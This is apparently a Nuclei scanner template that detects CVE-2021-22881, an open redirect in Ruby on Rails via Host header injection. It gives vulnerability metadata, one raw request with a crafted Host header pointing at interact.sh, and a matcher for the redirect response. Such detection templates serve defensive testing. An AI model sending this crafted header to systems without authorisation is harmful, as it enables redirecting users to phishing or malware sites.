Ruby on Rails - Open Redirect via Host Header Injection

id: CVE-2021-22881

info:
  name: Ruby on Rails - Open Redirect via Host Header Injection
  author: theamanrawat
  severity: medium
  description: |
    Ruby on Rails action pack before 6.1.2.1, 6.0.3.5 contains an open redirect caused by special crafted Host headers in combination with allowed host formats, letting attackers redirect users to malicious websites, exploit requires attacker to control Host headers.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to version 6.1.2.1, 6.0.3.5 or later versions.
  reference:
    - https://hackerone.com/reports/1047447
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22881
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-22881
    epss-score: 0.87239
    epss-percentile: 0.99726
    cwe-id: CWE-601
  metadata:
    verified: false
    max-request: 1
  tags: cve,cve2021,ruby,rails,host-header,redirect,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: interact.sh#{{randstr}}.{{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 4a0a00473045022100ddec812f40a2725db7a89d3b1d8fa568e7343f098b0347988fc916d3bbb6ff0902200982daed65e57f4c4c184b6423e50d564f1a90d9b24efdc66611a319935e3a6e:922c64590222798bb761d5b6d8e72950